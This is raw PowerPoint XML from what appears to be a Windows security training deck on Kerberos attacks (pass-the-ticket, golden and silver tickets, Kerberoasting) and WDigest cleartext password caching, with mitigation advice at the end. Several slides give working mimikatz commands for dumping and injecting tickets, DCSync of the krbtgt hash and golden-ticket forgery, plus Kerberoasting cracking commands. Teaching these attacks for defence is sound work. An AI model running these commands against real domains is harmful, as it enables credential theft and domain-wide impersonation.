            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> also has its set of weak spots. From forging ticket to brute forcing, we will cover the main attacks leveraging this authentication protocol.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A998DF33-3556-4B2B-B22D-ECE53D54B68E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274702" y="420949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8E9F0A85-6F9E-4B54-92CB-B666BD359D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686645" y="5372582"/>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Attacks based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wdigest</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A quick review on the protocol which caches a clear-text version of the user’s password in Windows.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDB56354-C774-47EF-BD60-42C90BAC0AFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274702" y="534255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BDE67C3B-E9B7-4255-9102-226A52CE3017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110354" y="1974153"/>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a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Other offline attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this section, we quickly cover what an attacker could do if it gets a hand on some memory dump and other sensitive files.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23CA9449-E874-4F2C-9DA8-701FE7C06FC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4698411" y="1944130"/>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07</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 the Ticket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Extract the TGT from the LSASS memory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This requires the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>seDebugPrivilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>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Requires that the targeted identity has cached its credentials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Inject the TGT into your current session</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Either locally, or later on other systems by exporting it to a file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“new” ticket is used to request new service tickets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Does not trigger any failed authentication attempts </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A4DA83-BAFD-47A1-B8EC-3163E8D3352A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2111802" y="5192449"/>
            <a:ext cx="8046960" cy="1272656"/>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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0179D7"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This is possible because the hash is in the memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Needed for Single Sign-On</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2618915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 the Ticket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721292"/>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privilege::debug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::list /export</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#this export all tickets to .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kirbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> files on the current folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</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ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c:\TGTuser1.kirbi</a:t>
            </a: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1425657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Golden ticket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Craft your own TGT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requires the hash of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KrbTgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> (from a previous compromise)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Craft your own PAC too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Valid for as long as you want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Inject it to your session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save it in a file for later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impersonate any identity </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30276800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Pass the Ticket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567404"/>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privilege::debug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lsadump</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dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#take the RC4 hash (or NT Hash) of the output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::golden /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>admin:administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>domain:contoso.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /sid:S-1-5-21-13452501-2365100805-3685010340 /krbtgt:810b643c5316c8c3c90a10cfb17e2f31 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ticket:golden.kirbi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</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ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>golden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.kirbi</a:t>
            </a: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5758050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7215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Silver ticket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30654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Craft your own service ticket </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requires the hash of the service/computer account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Craft your own PAC too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Valid for as long as you want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Inject it to your session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save it to a file for later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impersonate any identity against one service </a:t>
            </a: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1071992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Roasting</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14882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Offline attack of Kerberos tickets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Request a ticket for a service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Requires a valid TGT</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Take it offline and try to decrypt the service ticket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Which means try to find the cleartext password that was hashed and used to encrypt the ticket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Once the key is found, you can even add users in the PAC</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More efficient if the encryption is RC4</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is also possible to roast TGTs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the account has pre-authentication disabled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46698995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roasting</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721292"/>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./tgsrepcrack.py wordlist.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ticket.kirbi</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./kerberoast.py -p Password1 -r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ticket.kirbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql.kirbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -g 512 </a:t>
            </a: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r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Then use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to put it in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</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ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql.kirbi</a:t>
            </a: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292928576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F65F8-574A-483E-B049-250EE30D090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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{372E6904-E929-4D1E-9C69-E56D931D9E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" err="1"/>
              <a:t>Wdigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du texte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFB3C204-9D4A-434C-852F-DE480BDC8CEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366141" y="1922261"/>
            <a:ext cx="11887200" cy="35086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Slightly better than basic authentication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idea of its creation was to avoid sending passwords in the clear over HTTP connections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Still very, very bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Requires the cleartext password of the user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Because of this SSP, the cleartext passwords of users are in the LSASS memory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Whether we use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Wdigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> or not! It is enabled by default up to Windows 8.1/Windows Server 2012</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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0194147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AF65F8-574A-483E-B049-250EE30D090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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{372E6904-E929-4D1E-9C69-E56D931D9E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>No more clear-text passwords </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du texte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFB3C204-9D4A-434C-852F-DE480BDC8CEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366141" y="1922261"/>
            <a:ext cx="11887200" cy="37102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Let’s face it. Nobody uses it… Disable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For Windows Server 2012 R2/2016 Windows 8.1/10 it is already disabled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For the Windows 2008 R2/2012 Windows 7/8 it requires KB2871997 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
